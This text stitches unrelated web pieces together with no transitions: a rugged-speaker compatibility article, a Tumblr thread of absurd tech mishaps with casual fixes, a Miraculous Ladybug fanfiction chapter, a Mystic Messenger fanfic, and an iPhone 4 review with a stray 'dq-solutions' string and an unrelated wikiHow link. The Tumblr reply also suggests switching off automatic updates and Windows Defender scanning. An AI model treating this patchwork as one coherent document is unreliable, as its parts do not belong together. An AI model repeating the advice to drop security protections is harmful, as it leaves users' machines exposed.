Using Rugged Speakers with Multiple Devices
Tumblr media
Are you in the market for a portable and reliable sound system? If so, there's no need to worry: rugged speakers are an ideal solution. But you may be wondering, are rugged speakers compatible with multiple devices such as phones and tablets? Well, the answer is yes! Yes, rugged speakers are compatible with multiple devices including phones and tablets. Rugged speakers can be connected through Bluetooth or wired options, and are compatible with different operating systems. Rugged speakers offer convenience, portability, better sound quality, and durability. In this article, we will explore the different ways about Using Rugged Speakers with Multiple Devices
Types of Rugged Speakers
Tumblr media
As a big fan of the outdoors and a music lover, I'm always on the lookout for speakers that can stand up to the elements and still make a great sound. I've used many kinds of rugged speakers over the years, and I've found that each one has its own features and benefits. Portable Rugged Speakers A rugged speaker that is great for camping, the beach, and other outdoor activities is a portable speaker.  These speakers are small and light, so they are easy to pack and take with you. They’re also designed to be durable and shock-resistant, so you don’t have to worry about them getting damaged during transportation. Waterproof Rugged Speakers A waterproof speaker is another type of rugged speaker that is great for activities that involve water, like swimming or kayaking. These speakers are made to be completely waterproof, and many of them float so they are easy to find if they fall into the water by accident. Read More: How to Waterproof Outdoor Speakers? Shockproof Rugged Speakers Lastly, there are rugged speakers that are shockproof and great for people who want a speaker that can handle rough terrain and drops. These speakers are built to withstand drops, bumps, and other impacts without affecting their sound quality. Overall, each type of rugged speaker has its own benefits and features that depend on what you need and what you like. There is a rugged speaker for everyone, whether you want a portable speaker for camping, a waterproof speaker for water activities, or a shockproof speaker for rough terrain.
Compatibility with Phones and Tablets
I love to take my music with me, so I've tried out a lot of different speakers over the years. I've found, though, that many of them don't work well with all of my devices, which can be frustrating.  That's why I was interested when I first heard about rugged speakers. These speakers are made to be tough and portable, and they work with a variety of devices like phones and tablets. Bluetooth Connectivity I decided to try rugged speakers, and I was happy to find that they did work with my devices. Most rugged speakers have Bluetooth, so it's easy to connect them to any device that can use Bluetooth. This means I don't have to deal with cords or wires when I connect my phone or tablet to the speaker. Wired Connection Options Many rugged speakers have wired connections like an AUX cable or a USB port in addition to Bluetooth. This is useful for devices that don't have Bluetooth connectivity or for situations where Bluetooth isn't available or the connection isn't stable. Overall, I've been happy with how well my different devices work with rugged speakers. They are easy to use and can be used for many different things, making them a great choice for anyone who wants to take music with them.
Benefits of Using Rugged Speakers with Multiple Devices
Tumblr media
I love the outdoors and music, it's always been hard for me to listen to my favourite songs in the great outdoors. Whether I'm camping, hiking, or just hanging out on the beach, the speakers on my phone just aren't good enough.  This is where rugged speakers come in. They have many benefits for people who want to listen to music outside. Convenience and Portability First of all, rugged speakers are very easy to carry around and can fit in a backpack or tote bag. Because of this, they are great for outdoor activities where space and weight are limited. Also, most rugged speakers are very strong and won't break if they get dropped, bumped, or exposed to the elements. This means you don't have to worry about your speaker breaking because it was handled roughly or because it was outside in bad weather. Better Sound Quality Compared to Built-In Device Speakers The sound quality is also better with rugged speakers than with the speakers that come with the device. Rugged speakers are made to be louder and have better sound quality than speakers on smartphones or tablets. This makes them great for outdoor events and gatherings. Flexible and Easy to Use Lastly, rugged speakers are convenient because they can be used with different devices, like phones and tablets. They can connect through Bluetooth or wires, which makes them very flexible and easy to use. In conclusion, people who want to enjoy music outside can get a lot out of using rugged speakers with multiple devices. Rugged speakers are a great addition to any outdoor adventure because they are portable, durable, have better sound quality, and can be used with more than one device.
How to Connect Rugged Speakers to Multiple Devices
Tumblr media
Connecting rugged speakers to more than one device is easy, and I've done it a lot of times. Before I try to connect my speaker to anything else, I usually make sure it is charged and turned on. Step-By-Step Guide for Bluetooth Pairing Bluetooth is one of the most common ways to connect a rugged speaker to more than one device. To connect, I put my speaker in pairing mode and turn on Bluetooth on my phone or tablet. Once the speaker is in pairing mode, it shows up in the list of Bluetooth devices on my device. I choose the speaker and wait for the two things to connect. Instructions for Wired Connections I could also use a wired connection, like a 3.5mm auxiliary cable, to connect my speaker to my device. I just plug one end of the cable into the headphone jack on my device and the other end into the auxiliary port on the speaker. This method is especially helpful if I want to save power on either device or if the Bluetooth signal is weak where I am. It's important to keep in mind that some rugged speakers might not work with some devices or operating systems. So, it's always a good idea to check the user manual of the speaker to see if it has any specific requirements for compatibility.  Overall, connecting rugged speakers to more than one device is easy and can make my listening experience much better.
Common Issues and Troubleshooting
As someone who has used rugged speakers with their phone and tablet, I have run into some of the most common problems that can happen. Connection Problems Connection problems are one of the most common problems I've had to deal with. Even though I've tried many times, my phone or tablet hasn't always been able to connect to the rugged speaker.  When this happened, I found that turning off the speaker and clearing the Bluetooth cache on the device helped to fix the problem. Sound Quality Issues Another problem I've had is with the way sounds are made. When there is a lot of noise around, it can be frustrating when the sound is distorted or not loud enough. I've found that adjusting the volume on both the device and the speaker can help improve the sound quality in these situations. Battery and Charging Problems Lastly, I've had problems with the battery and charging, which can be hard to deal with when I'm using the speaker outside. The battery may not last as long as expected, or the speaker may not charge properly.  In these situations, I've found that using a different charging cable or adapter or checking the charging port for dust or debris can help fix the problem. Overall, these problems can be annoying, but I've found that most problems with rugged speakers can be fixed with a little patience and some troubleshooting.

LMAO
I mean, I can try giving you some ideas, but whether they work or not will be a mystery until you try them (?)
Give me a sec because tumblr posted this instead of saving it in my drafts and I didnt finish putting links about everything LMAO -> about tumblr, there is not much you can do, it is a hellsite. It works weirdly sometimes
However, the delay may have to do with it failing to connect to the servers correctly, as when your internet connection is slow / does not work. You can try checking your app config, and make sure that Tumblr can use internet without data restrictions nor battery restrictions (both of them could make tumblr work slower / not work if the app is not opened)
Ok, the electric razor and the charger ones could possibly be because of hardware damages, like a loose wire, lets say, which is why they need specific positions or connectors -> could be the bluetooth case too, but tbh it would be more funny to just imagine they need moral support
There's not much you can do with those, other than sending them to tech support or buying new ones (?)
The lid one could be because of the pc suspending itself (a windows battery saving mode that pretty much crashes your pc if you dont have enough ram, happens to me) -> you can disable that
The mouse deactivating could be something having to do with firefox somehow disabling stuff from your pc -> it could have to do with incompatibilities or other problems
For your phone changing timezones, you can disable roaming time and automatic timezones, as to define it yourself. It could also be thinking youre somewhere else because of google sync detecting your location wrong -> check where youre logged in just in case
The mcaffee thing may be mails or a chrome extension, or sth that your pc is sync to, which is why its showing those notifs -> if you recieve another, you can disable them
Also, I recommend MalwareBytes to check your antiviruses, because its the only one Ive used that detects niche spam apps installed accidentally (in my experience)
For your pc taking so long to turn on, you may like disabling your apps at start. About the windows updates, it probably failed it once, and tried fixing it ever since (which never works, because its windows) -> try executing the windows fixer service (you dont have to download anything, saying it just in case), may work or not. If it doesnt, you can disable automatic updates.
For your pc turning on in the middle of the night, it may be windows defender or sth? Trying to analyze your files and failing horribly, opening them instead. You can try disabling that. Otherwise, check that the game its not tasked to open at certain times just in case.
For your keyboard turning on and off, you may want to check your drivers (uninstalling and installing them again) along with other configs like the usb ones, or check that it is not accidentally pressing some shortcut that disables it.
Good luck 🫡
For your phone, after falling into water, it does not surprise me that it is acting weird from time to time lmao. You can try disabling the wifi switching tho, in case it works, for your languages, check that you havent selected multiple languages or that your google account has english as its main one.
please do share all of your tech mishaps
ok, here's a little insight into my hell:
My laptop doesn't charge unless it's got two chargers and is held at a 90 degree angle, and won't charge in direct sunlight
It also just installed Cars 2 and keeps trying to open something called 'wonderprojectj2' which has got to be a virus but my antivirus isn't detecting malware
Firefox regularly disables my mouse, and sometimes keeps playing the audio from youtube videos even once the browser is closed and if the laptop lid is down - it also stops working completely at random on my laptop, until I pick it up shake it, and Microsoft Word usually crashes the laptop entirely
If I either queue posts or post them from drafts Tumblr yeets them into the aether - usually they show up 5-15 minutes later, but some show up hours after, some are returned to my drafts and some just never show up at all; it also crashes completely if there is already a tumblr tab open or if I have tumblr mobile open on my phone at the same time
My alarm clock changes timezones at random
My electric razor won't work unless it's fully submerged in water first for 2-3 minutes
My desktop takes 10-15 minutes to start, and I can't touch the tower because it's as hot as the sun - it also downloads the same update over and over every time I shut it down, and sometimes it turns on by itself in the middle of the night and runs Ace Attorney Chronicles
My keyboard turns on and off for no reason every couple of minutes
I switched antivirus and ever since McAfee sends me these threatening pop-ups saying "do not Leave" - which I thought was a virus, but my new antivirus says there's no problem
My bluetooth headphones won't connect to new devices unless I sing to them - I know that makes no sense but I swear to god I've tried over and over and no matter what they never work until I start singing
I spent some time in Singapore a few years ago and now Singapore Airlines randomly sends me texts saying 'Welcome to Singapore!' and every time they do my phone clock automatically changes to Singapore time for some reason
But on the positive side, I dropped my phone in the Amazon River about a year ago and had to dive into the water fully clothed to rescue it, and now it holds charge twice as well as it did before - but now it switches wifi networks at random, repeatedly tries to access strangers' hotspots, and if I ask it to forget a wifi network it connects to it automatically and changes the language to german
i cannot explain any of this, if you have a solution to any of the above please let me know i'm so tired

You can count on me (I will be there for you)
Penultimate chapter, here we go! Discoveries are made, and they’re not for the best. Hope you enjoy!
Special thanks to the lovely @theanxiouscupcake for helping me figure out the ending :)
Part 1 | Part 2 | Part 3 | Part 4 | Part 5 | Part 6 | Part 7 | AO3
---
Chapter 8
Ladybug helplessly watches Chat sink out of sight, and she knows he won’t find anything good, wherever he’s headed. It’s less of a gut feeling (what honest person has secret mechanisms lying around their house in fiction, not to mention real life?) than an informed guess based on what she’s holding.
She’d hit the jackpot in Nathalie’s room. The envelopes she found weren’t empty, but they didn’t contain blackmail destined to Ladybug; it was clearly targeted at Hawkmoth and Mayura. Given that they’d all been opened with a paper knife, she doubted that Nathalie had been on the sending end.
The Peacock brooch she’d found in her nightstand, along with Duusuu, had done nothing to help Marinette in her quest for an explanation that could disculpate her.
She knows she's found what she needed, but it really feels like a Pyrrhic victory.
“Chat Noir? Is everything alright?” Max’s voice over the comms snaps her out of her thoughts.
There’s a tense silence as they wait for an answer, which she decides to break after a couple of minutes, for her own sanity.
“So, what did you find?” She asks, eyeing Markov. The robot is holding a USB key, which is unusual, since Max generally uses him directly as a memory source when needed. She doesn’t doubt that he also carries a copy of the data they’ve found, meaning that the information must be very important.
“An annotated digital copy of a Miraculous book, very expensive and regular butterfly orders, Hawkmoth redesign costumes, and elaborate plans to defeat you and Chat Noir.” Her friend enumerates. It all checks out. “Oh, and some music videos starring Hawkmoth.”
“What?” She frowns.
“It’s very disturbing.” Max grimaces.
Her next question is barely formulated in her head when Chat Noir’s voice reaches them. “Guys?”
“Chaton!” She refocuses on him immediately. “Are you alright?”
“I’ve found something.” His voice is strained.
“Don’t move, we’re coming.” She runs towards where the platform had been mere minutes ago, looking around frantically for the trigger mechanism.
Max puts a hand on her shoulder to calm her down. “Could you just tell us how to join you?” He asks.
Chat explains the steps in a monotonous voice that worries Max and Ladybug enough that they decide to ride the elevator together. It’s a little cramped, but the quicker they get to him, the better.
The tube quickly opens and they step out into what looks like an attic in a flutter of white butterfly wings.
Chat Noir has his back to them, his suit looking darker than usual in the backlight. He turns around from the truly impressive window he was looking out from when he hears them, a sad smile pulling at his lips.
“This doesn’t really look like a good guy’s den, does it?” He tries to joke.
“It does look a little suspicious,” she concedes.
“Did Adrien ever tell you his Dad was a lepidopterologist?” Max asks, a butterfly landing on his outstretched hand, as if he’s still trying to find a rational explanation for the situation that doesn't involve Gabriel Agreste being Hawkmoth.
“A what?” Chat looks at him, perplexed.
“A lepidopterologist,” his friend repeats. “Someone who studies butterflies.”
“Nope, I don’t think he has a clue.” He shakes his head and clears his throat. “But anyway, what did you guys find? Anything interesting?”
Ladybug hands him the envelopes and the brooch. His eyes fly over the letters’ contents, his expression indescifrable, while Max repeats his own findings.
“Max, what is the probability that Gabriel and Nathalie are just storing stuff for Hawkmoth and Mayura?” Chat asks gently, folding the letters again and giving them back to her. She sticks them in her yoyo for safe-keeping.
“I’d say about 0,0152%.” Max announces after a couple of seconds.
“That’s not very much.” He grimaces.
“Good thing Adrien didn’t come with us.” Ladybug whispers. “It’s… a lot to take in.”
“Sure is.” He sighs.
“Everyone, there seems to be another shaft here.” Markov interrupts them, flashing a red light to indicate his position in one of the dark corners of the room.
They walk towards him and study their surroundings, Max spotting the associated buttons first. Chat figures that it can’t bring them back to the study; it’s too far away from the first one.
“Multiple levels? What kind of evil lair is this?” Ladybug mutters.
“A professional one, that’s for sure.” Max replies. “Should we check it out?”
Ladybug looks at the time on her bug phone. They’re still doing okay, having been particularly efficient with their search. Or just very lucky that Hawkmoth and Mayura are bad at hiding compromising evidence.
She activates her microphone. “Nino, Kagami?”
“Yes, Marinette?” Kagami’s voice is prompt to reply.
“How are things going?”
“Not too bad, I think. Nino’s keeping Gabriel occupied, and I’m keeping an eye on Nathalie. They don’t seem to be in any rush to leave.”
“That’s good to hear.” She sighs in relief.
“How about you guys? Is Chat okay?”
“Right as rain.” Chat Noir chimes in. “We just have one more thing to investigate and we’ll be back.”
“Okay, cool. Keep us posted!” Kagami replies.
“You too.”
There’s a little static as Chat releases his microphone button.
“Right, so that’s sorted. I’ll go first.” Ladybug states more than she volunteers, calling the lift. She suspects Chat Noir would have liked to lead the way, but he’s a little pale for her liking, and Kwami knows what they’ll find on the other end.
“Are you sure?” He looks at her, contrasting emotions flickering in his eyes. On the one hand, he seems to be relieved that she’s taking charge of the exploration, but on the other hand, she knows he must be worried about her going first.
"You guys will be right down, it’s fine.” She smiles and squeezes his arm lightly, before entering the elevator capsule.
She’s surrounded by darkness for the first part of the journey, but the dim lighting of the lift is oddly comforting; she finds herself thinking that it might relieve Chat Noir’s claustrophobia.
The tube then transitions to transparency, and she’s suddenly looking out onto one of the largest and oddest rooms she’s ever seen, if ‘room’ is even the right word for it. The space looks like some kind of underground church, with its metal nave extending above a body of water and leading to a little garden, centred around a large tubular object. The latter is overseen by a large window that reminds her of the one up in the attic, except the panes are blocked off. It isn’t dark, though; a ray of light shines from above, and dim lights are regularly spaced along the sides of the room.
The elevator doors open and Ladybug steps out unsurely, not daring to venture too far. She feels very small as she waits for Chat Noir and Max, and a little uncomfortable, like she just broke into a sacred place. She untenses a little when they join her.
“What is this place?” Chat Noir lets out a low whistle as he takes in the grandeur of the space.
“It looks like some kind of underground crypt.” Max pushes his glasses back up on his nose. “We’re really not far from the Marais, maybe this was a church that sunk at some stage and was built over?”
Ladybug nods. It seems like a decent explanation.
Chat’s gut twists as he takes a couple of steps forward. He has an awful feeling about what lays at the end of the bridge, yet he’s inexplicably drawn to it. Ladybug and Max follow him carefully as he makes his way towards it.
The tube at the end of the way looks a lot like a coffin, they realise, and as they approach it, they must have triggered some motion detector, for its cover recedes, revealing a seemingly sleeping woman.
And not just any woman.
Emilie Agreste.
She’s dressed in a white suit, a slight smile on her lips, and holds a large bouquet of white and red flowers. She looks so peaceful, so beautiful. So like her portraits. Ladybug half expects her to wake up, green eyes twinkling as she welcomes them.
Next to her, Chat Noir’s breath hitches and his hand extends to touch the glass, a tear rolling down his cheek. It shatters as it lands on the coffin.
“You’re here.” He whispers.
Ladybug shares a look with Max, who encourages her to step forward with a nod. She does, lacing her fingers through Chat’s free hand and giving it a squeeze.
“I didn’t realise you were this close.” Her voice is barely above a murmur as another tear hits the coffin. Anything louder would feel disrespectful. Chat just nods in reply.
From this angle, she realises, Emilie looks just like Adrien; same fine features, same kind smile, same blond hair. She can’t help but understand why it must have been hard for Gabriel Agreste to look his son in the eye, at first.
“Um, guys?” Nino’s voice breaks the silence, making them jump. “I think we’ve maxed out the small talk. Kagami’s trying to hold off Nathalie but Gabe is just openly avoiding me now. Can we give them a bit of a breather?”
“Absolutely not.” Chat’s reply is icy as he angrily wipes his tears with the heel of his hand. “We’ll be right back, just need to call the police. Do not let them out of your sight, especially Gabriel. He might have his Miraculous on him.”
“Oh dude, I’m so sorry.”
“It’s fine.” He takes a shaky breath. Marinette gives his hand another squeeze and takes her yoyo out. She spots Max taking out his phone out of the corner of her eye and turns towards him slightly, blinking gratefully at him. Chat doesn’t seem to be in the right frame of mind to call the police himself. She calls Rena Rouge.
“LB?” Her friend answers immediately.
“Alya? Are you in my room?”
“Yes, need anything?”
“Could you get the Bee Miraculous in my sewing box, please? I’ll send you the code.”
“Sure. Do you want me to go downstairs and give it to Chloé? Or should I stay put?”
“We’re going to need you downstairs, but make sure no one sees you yet. We need all hands on deck for this.” She takes a deep breath. “And make sure Adrien’s safe for me?”
“Will do.”
She hangs up just as Max calls his transformation.
“There’s a unit on its way here, and another heading for the Château. They’re warning the police officers who are already on site, they’re going to start closing off the exits. They said they’d take the evidence from us over there.” Her friend reports.
“Good.” She says, and she sees Chat Noir nod next to her, eyes still aimed at the coffin. “Let’s go, then.”
Pegasus invokes his powers and jumps through the portal. Chat Noir tears his gaze from Emilie and goes to follow him.
Ladybug holds him back before he can step through. “Are you sure you’re going to be okay, Chaton?”
“I just need to end this once and for all.” He smiles sadly and kisses her forehead tenderly, before taking her hand and helping her through.
He turns around and blows Emilie a last kiss before joining his wife.

Saeran Choi Week - Day 6
Afterendings || AU
---
You know that part in Seven’s route where Seven shows Saeran the pictures of him and he goes into denial? Of course, you do! I’ve always wondered what that scene would be like from the perspective of Saeran’s route. These are my ideas for that, and also some of my ideas about how his after ending could go!
---
MC and Saeran have been staying in Saeyoung’s bunker for a while now. It’s strange, even though she’s never met him in real life, MC still feels his absence. The place carries so much of his personality it feels like he’ll walk through the door any minute.
They don’t plan on staying here forever, they want a place to call their own, a place that feels like theirs but for now, it's a blessing to have a place to stay free of charge and with everything they need while the couple gets on their feet.
As they accumulate their own belongings though, they find the need to start to pack some of Saeyoung’s stuff away for now. They haven't given up hope that he’s still out there. Saeran had even found some good leads he had sent to the C&R Intelligence Unit earlier this week.
“I’d feel it if he was gone.” Saeran had said one night after a long session of searching CCTV’s for any hint of his brother. “I just know I would. I’m sorry. I probably sound insane to you.”
But MC understood. She always understood. If Saeran believed Saeyoung was still out there then so would she. But she still had to get some of his stuff away. Her book collection needed a little more space, and it wasn’t like Saeyoung even had that many books on his office’s bookshelf anyway - maybe about ten or so accompanied by boxes of small electronic components she couldn't make sense of.
She nestles the smaller boxes into a larger one then begins to take the few books off the shelf. As she picks up a particular book - a children’s book that she does think much of at first - something clatters to the ground next to her foot.
She bends down, retrieves a small square of plastic, realizing its a floppy disk. “Who uses floppy disks anymore? I didn't realize Seven was an antique collector.” She comments, turning the item around in her hands looking for a label, there isn’t any though.
Saeran turns around in his computer chair, curious. “Let me see?” he asks, holding his hand out, she hands it over and he gives it a similar inspection.
MC’s eyes scan the minor monstrosity that is Saeyoung’s work area, although Saeran has attempted to clean and organize the wires and various components that make it up, it’s still a mess to her. “Does he even have a floppy disk reader?” She asks.
She watches as her boyfriend opens and closes multiple desk drawers, then stands and leaves the room. Moments later he returns with a small drive in hand.
“I thought I saw one somewhere, he had this in a kitchen cabinet behind some old cereal boxes.” He shrugs, although he wants to reunite with his twin he doesn't pretend to understand the man’s methods of organization, or anything else for that matter. He hands her the cable. “Can you plug that into a USB port for me? There should be some open on the back still.”
“I think I can manage that!” MC says.”What do you think is on it?” She asks, from underneath the desk as she plugs the reader in.
“Memes? An old 8-bit video game? His senior thesis?” Saeran says, honestly baffled but what in the world his brother could have stored on a media form that has not been widely used since they were children.
He pops the disk into the drive and goes to open the folder, but it's in encrypted, of course it is. Saeran makes quick work of the encryption but is stunned when the encryption leads him to a string of personal questions. Questions that could only be answered by two people on earth. He takes a sharp inhale of breath.
“What is it?” MC asks eagerly.
“I… I think he meant for me to find this?” Saeran says, working his way down the list of questions. “I’m the only person that would know the answers to these, besides him.” He adds, filling in the answer for what the twins did on their 6th birthday while their mother was passed out in the kitchen.
He reaches the end of the questionnaire and finally gains access to the files stored on the disk. Photos of a young red-haired, golden-eyed boy fill the screen.
Saeran scoffs, “Why does he have a hard drive full of pictures of himself.” He says MC can hear the slight offense in his voice.
“That’s not him.” She says plainly.
“W-what do you mean?” He asks, staring up at her from his seat, wide-eyed.
“That's you, My Love.” He calmly says.
“N-no it’s not, I don't remember any of this,” he says. “Why do you think it's me?”
“You have a mole on your neck, right side, just below your jawline. See?” She points out the mole on the multiple pictures populating the screen before lightly brushing the same mole on his person. “Saeyoung doesn't have it. That’s you.”
“How? No that can’t be. That makes no sense.” He says, getting up from the desk and disappearing into the hall. MC follows him but allows him some space.
“I look happy! I look normal there!” The crack in his voice is apparent.
MC’s heart lurches to see him in pain, she never wants to see him in pain again, but she's afraid the fight will never be over for her love. She watches as he sits on the leather sofa and places his head in his hands. When he looks up again tears are trailing the expanse of his pale face.
“He really did think I was ok, didn't he? He thought I was happy.” He had suspected this, of course, had mostly accepted it, but at this moment it truly hits him for real. Saeyoung was fed lies too. He thought he was doing what was right, what was best for him. And Rika had Saeyoung tangled up in her lies just as much as him. The enormity of just how deeply the tendrils of lies reach hits him hard, and he cries.
MC sits down next to him and takes him into her arms, cradling him softly and running her hands through his hair. “It’s ok, we’re going to find him and you two are going to have a long talk. We’re going to figure it out. I’m going to help you figure this out.”
He moves to hug her, burying his face in the shoulder. “Thank you.” he chokes out, tears seeping through her t-shirt.
After a few minutes, his sobs calm “Hey.” She says gently, rubbing his back.
“Mm?” he responds raising his head from its spot.
“You were a pretty cute kid.” She says smiling and wiping a tear from under his eye.
He chuckles through another sob. “Thanks.” He says simply.
Suddenly Saeran’s phone begins to ring in the other room. He inhales deeply and wipes his face as he gets up, retracing his steps back to the office to answer it.
He taps the answer button near Jumin’s name and steadies his voice in greeting. “Hello?”
“Saeran,” Jumin says in his usual steady, deep voice. “We think we’ve found him.”
-----
Saeran and MC stand near a black C&R van as the largest amount of security and KPA officers either have them have ever seen storm an expensive-looking residence on the mountainside. After all the claims against Prime Minister Choi were confirmed legitimate it wasn't long before warrants of his arrest were filed, after which conveniently disappeared.
MC watches as Saeran nervously paces the small space at the bottom of the hill leading up to the residence, periodically biting his nails, then stopping himself.
An entire lifetime seems to pass before two of Jumin’s largest security officers drag a handcuffed, now former, Prime Minister out of the house.
Saeran’s blood runs cold as their eyes meet for just half a second before the man is shoved into a vehicle and promptly driven away. His chest shakes and he tries to steady his breathing. After a few minutes, he’s managed to calm himself a bit.
Moments later the doors open again, Revealing a long-haired brunette man repeating how he doesn't need help and a very familiar shock of red hair following closely behind him.
MC gasps, and before she can even register what is happening her boyfriend is gone, running up the hill in clumsy steps. She watches as he almost slips three times. She then realizes Saeyoung is running to meet him. Her heart swells at the heartwarming moment the twins embrace each other. She almost can’t believe this is happening at all but it is.
“Saeran?” Saeyoung says in an exhausted voice. “That's really you right?” He’s both unsure because this is too good to be true, and because his glasses have been missing for so long he forgets what clear vision is like.
“Yea - yea it's me,” Saeran responds, tears threatening his eyes again, but this time they are not sad tears. “I-It’s me.”
“Thank God. Thank you, God.” The older twin breathes. Squeezing his brother so tightly, almost like he might float away if he doesn't.
“You were the hacker, weren’t you?” Saeyoung asks, already sure of the answer but still in need of confirmation.
“Yes, I’m sorry.” Saeran answers “I’m so sorry”
“Me too.” Saeyoung answers. “I think… I think we have a lot to talk about.”
Saeran scoffs into his brother's shoulder. “Yea,” is all he says.
----
A few weeks later Saeran and MC sit on the couch in Saeyoung’s bunker once again, but this time everything is different. There is no looming absence anymore. The void Searan has felt for the past several years has finally been filled again. His brother is back and never meant to abandon him. Although he has to remind himself of this several times a day. The two of them still have a lot to work out in therapy, but they are together again.
The news is on TV as the two of them sit, holding hands. Saeran rubs the back of MC’s hand gently as the announcer begins the evening’s updates.
“Former Prime Minister Saejoong Choi has been sentenced to as little as 40 years in prison as of Tuesday.”
Suddenly Saeyoung’s voice comes from the hall as he enters the living room “Haha, YEA Suck it Old Man.” He exclaims excitedly as he plops himself down on the armchair adjacent to his couch.
“It would seem his career in the public eye is all but over, the man who was once adored by a nation is now behind bars. In the end, Choi ended up with over 107 charges against him but it would seem that one of his more heinous crimes was against his own blood, his twin sons. Kept secret from the world and cursed to grow up in poverty, and abuse. The county that once revered Saejoong Choi has now adjusted their affections onto the Choi Twins.”
MC watches as photos of the twins appear on the screen, Saeran becomes instantly uncomfortable as Saeyoung becomes quite the opposite.
“Can you believe this? Us? On TV?” Zen’s probably already jealous, we look amazing in those pictures too.” He says, legs bouncing in excitement.
“The older of the twins, Saeyoung Choi has been rated Korea’s Most Eligible Bachelor, a position that C&R’s Jumin Han has held for the past several years.”
Saeyoung doubles over in laughter as he hears this. “Poor Juju, All that work he did to help us too.”
“I don't think Jumin ever really wanted that position to begin with,” MC tells him. “I hope you’re ready Saeyoung.” She continues, almost ominously.
“Oh, I’m ready” Saeyoung accepts, a mischievous grin gracing his features. “But Korea’s not ready to learn that I am forever in love with my dearest Elly, and so they will lose both of their most eligible bachelors to her impeccable beauty!”
“It would seem that many people we surveyed on the street were disappointed to hear that the other Choi twin, Saeran is undoubtedly “off the market”.” The announcer continues.
The TV cuts to a scene from last week, Saeran had thought he could pick up a few things from the convenience store without being bothered but he inevitably thought wrong. In the video, Saeran stands holding a carton of ice cream he had freshly picked from the freezers of the store, surrounded by several news personnel.
“Saeran Choi, The nation is dying to know, do you have a girlfriend?”
In the video, Saeran fidgets for a second before taking a breath and speaking. “Yes, I have a girlfriend, and I love her very much. In fact if not for her I would not be standing here today, and neither would you. I would very much appreciate respect for both her and our relationship as I will not tolerate anything else.”
A light blush appears on Saeran’s cheeks, embarrassed and uncomfortable with being in the public eye and seeing himself on TV.
MC, on the other hand, is filled with adoration, promptly throwing her hands over her boyfriend's shoulders in a tight embrace.
“Bro, that was so cool.” Saeyoung says, stunned at his brother's calm collectiveness on camera.
“Babe, that was so sweet.” MC says, nuzzling her boyfriend's sweater.
“It’s only the truth, as long as it’s up to me, I won’t let anything or anyone come between us.” He says.
“Nothing is ever going to come between us.” MC confirms, giving him a quick peck on the lips.
“Should I leave you two alone? I could see if Yoosung needs some company for a while?”
Saerans already apparent blush becomes much deeper “No! No of course not. This is your house, remember?.”
“Mmhmm” Saeyoung hums, “ Well, you just let me know if the County’s Sweethearts need some ‘Alone Time’” he says teasingly as he retreats back down the hallway.
Saeran breathes out, relieved to be free from his brother’s teasing, but also relieved to be able to be teased by his brother, it’s been far, far too long.
Even if he’ll never completely understand his brother or his motivations, even if his jokes still sometimes grate on him the wrong way, they’re together. They are brothers again, not enemies and it feels better than he had ever imagined. Their father is in prison, where he aptly belongs. There are still things that need to be figured out, the Mint Eye issue will need to be taken care of next, but with him on the RFA’s side this time around he knows they will be a force to be reckoned with.
He has MC, He has Saeyoung, He has everything he needs and his life feels like it is finally beginning.

Is the iPhone 4S a Huge Waste of Money? Find Out Why You Should Keep Your iPhone 4 and Not Upgrade
With the iPhone 4S on the market it's only natural to question whether you should buy that or the older model iPhone 4. I didn't have this option when I purchased the iPhone 4 because the 4S wasn't out at the time, and by the time you purchase your iPhone there will probably be about 10 other newer versions out. Of course I'm kidding but apple do tend to release a new iPhone every year.  dq-solutions
In this review I am going to be looking at the iPhone 4. https://www.wikihow.com/Charge-an-iPhone-XR
What's in the box?
If you're already a customer of Apple then you will know that most of their products come with the bare minimum, the iPhone is no exception. Inside the box you will receive:
The iPhone 4
USB Connector Cable
Power Adaptor
Mini Sim Card
Should you buy an iPhone 4?
The answer of this question ultimately comes down to your preference. Personally I haven't yet tried the iPhone 4S so I can't comment on how good that device is, however from looking at the phones specifications and user reviews for the extra money you would pay for the 4S I think personally I would prefer to save some money and stick with the iPhone 4.
Blackberry users thinking of making a switch should note that iPhone's now come with something called iMessage, and basically it's a free way of communicating with other iPhone users just like Blackberry messenger.
The iMessage feature really isn't that big of a deal to me as my network provider already gives me unlimited texts in my price plan, but if you haven't got unlimited texts and you have a lot of friends using an iPhone then this feature will save you a ton of money. iIMessage also allows you to send images to your friends free of charge.
Processing Power of the iPhone 4
If you have done your research into mobile phones then you will know that some mobile phones have dual cores, without getting two technical the more cores you have the better processing power your phone is going to have. There are other factors that come into play such as the clock speed of these cores but like I said for the purpose of this review I won't get too technical. The iPhone 4 only has a 1GHZ single core processor whereas the newer model phones such as the Samsung Galaxy 2 have 2 cores. This however shouldn't put you off as the iPhone will handle all the tasks you want it to. I have only ever found the phone to go slow when you are running multiple apps simultaneously.
iPhone 4 Phone Design
iPhone 3 and 3GS users will be used to their sleek looking device with the curved plastic back, and I must admit I loved this design, so when the iPhone 4 came along with its rectangular and flat design I was rather put off and thought initially that it was borderline ugly.
Without a phone case there is no question that I still prefer the feel to the 3GS over the 4 but with a case I find the iPhone 4 easier to grip and it feels like a much more solid mobile phone.
The iPhone 4 is much different from its little brother the 3GS its much more compact but still weights 137g, so you get a much smaller yet compact device that feels solid. The side of the phone is stainless steel where the front and back are made out of some type of reinforced glass.
I have seen one review website saying that one of their employees has dropped this phone out of a low level window and nothing happened to the phone, now sorry I don't believe this at all. Maybe they wrapped the device in bubble wrap first and then tried it, but otherwise this device will crack. Having said that if you drop this phone from your pocket to the ground then you shouldn't receive any problems, but just to make sure I would recommend getting a cheap case off eBay or somewhere like that.
iPhone 4 Camera
I have never used an iPhone camera previously to owning this iPhone 4 so I wasn't sure of the quality that the phone would produce. On using the camera I very much like it, I think the quality of image is great the colors are realistic and the built in flash is pretty good but can sometimes overexpose the image. I often find myself using the built in flash as a torch with the iTorch4 app. The HDR mode is also pretty cool and what this mode does is take 3 different exposure levels and blend them together to give a cool looking image.
The high definition video recording is also something I wasn't expecting from a mobile phone and I was surprised when I saw that the iPhone 4 had it. Once again the quality is excellent and Apple has done a good job with implementing this into such a small device.
The iPhone 4 has 2 cameras built into it and I probably should have mentioned this earlier. One of the cameras faces outwards and this is the camera I discussed above and one of the cameras faces inwards. This camera is useful for the face time application. This application is like a webcam that allows you to talk to other iPhone/iPad users. Face time allows both parties to see each other and communicate. The camera that is used for this isn't as good as the main camera in my opinion and often gives a darker and grainier picture.
iPhone 4 web browsing
Before owning the iPhone 4 I owned a blackberry curve 8900 and web browsing on that mobile phone was painfully slow and quite often didn't even work. In fact I would say the Blackberry 8900 web capabilities were nonexistent. Upgrading to the iPhone was amazing. Now you may already browse the web with a different mobile phone and it probably works well for you, but when you have a device that never works and transfer to a device that is very quick and simply works I assure you it is amazing.
